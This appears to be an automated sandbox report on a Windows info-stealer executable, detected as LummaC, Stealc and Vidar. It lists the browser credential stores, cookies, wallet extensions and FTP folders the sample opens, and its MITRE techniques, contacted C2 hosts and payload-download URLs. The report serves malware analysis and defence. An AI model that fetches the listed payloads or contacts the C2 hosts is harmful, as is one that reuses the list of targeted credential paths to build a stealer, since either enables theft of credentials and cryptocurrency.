Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ATJBEMHSSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ATJBEMHSSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ATJBEMHSSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\ATJBEMHSSB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\BQJUWOYRTO	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\UBVUNTSCZJ	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	2 OS Credential Dumping	751 Security Software Discovery	Remote Services	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	34 Virtualization/Sandbox Evasion	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	42%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.ZPACK.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.206/405117-2476756634-1003bO	100%	Avira URL Cloud	malware
http://185.215.113.16/S/-3	100%	Avira URL Cloud	phishing
https://cook-rain.sbs/api=	100%	Avira URL Cloud	malware
http://crl.micy1D	0%	Avira URL Cloud	safe
http://185.215.113.16/7J	100%	Avira URL Cloud	phishing
https://cook-rain.sbs/apiC	100%	Avira URL Cloud	malware
https://cook-rain.sbs/apiecked	100%	Avira URL Cloud	malware
https://cook-rain.sbs/;	100%	Avira URL Cloud	malware
http://185.215.113.16/steam/random.exebKit/537.36	100%	Avira URL Cloud	phishing
http://185.215.113.16/off/def.exeO	100%	Avira URL Cloud	phishing
http://185.215.113.206/ntdesk	100%	Avira URL Cloud	malware
http://185.215.113.16/tp	100%	Avira URL Cloud	phishing
http://185.215.113.206/c4becf79229cb002.php?#	100%	Avira URL Cloud	malware
http://185.215.113.2069	0%	Avira URL Cloud	safe
http://185.215.113.16/8L$3	100%	Avira URL Cloud	phishing
https://cook-rain.sbs/apix	100%	Avira URL Cloud	malware
https://cook-rain.sbs/apiq	100%	Avira URL Cloud	malware
http://185.215.113.16/x4e3	100%	Avira URL Cloud	phishing
https://cook-rain.sbs/on	100%	Avira URL Cloud	malware
https://cook-rain.sbs/D(	100%	Avira URL Cloud	malware
http://185.215.113.16/qd#3	100%	Avira URL Cloud	phishing
http://185.215.113.16/zwn35	100%	Avira URL Cloud	phishing
https://cook-rain.sbs/v1=	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cook-rain.sbs	188.114.97.3	true	false		high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	false	high
peepburry828.sbs	false	high
p10tgrace.sbs	false	high
processhol.sbs	false	high
185.215.113.206/c4becf79229cb002.php	false	high
https://cook-rain.sbs/api	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
p3ar11fter.sbs	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/405117-2476756634-1003bO	file.exe, 00000002.00000002.1632829541.0000000000754000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micy1D	file.exe, 00000002.00000003.1490451305.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/S/-3	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cook-rain.sbs/apiecked	file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cook-rain.sbs/;	file.exe, 00000002.00000003.1421786251.000000000546F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422914925.0000000005473000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1421973811.0000000005473000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cook-rain.sbs/apiC	file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/7J	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeO	file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exebKit/537.36	file.exe, 00000002.00000002.1632719419.000000000057A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cook-rain.sbs/api=	file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/ntdesk	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/tp	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/c4becf79229cb002.php?#	file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/C	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.2069	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cook-rain.sbs/apix	file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/8L$3	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cook-rain.sbs/apiq	file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exe	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/x4e3	file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://cook-rain.sbs/	file.exe, 00000002.00000003.1478339631.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1450031646.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1490554719.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532395344.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449635687.0000000000802000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cook-rain.sbs/v1=	file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php/	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/i	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php:	file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp	false		high
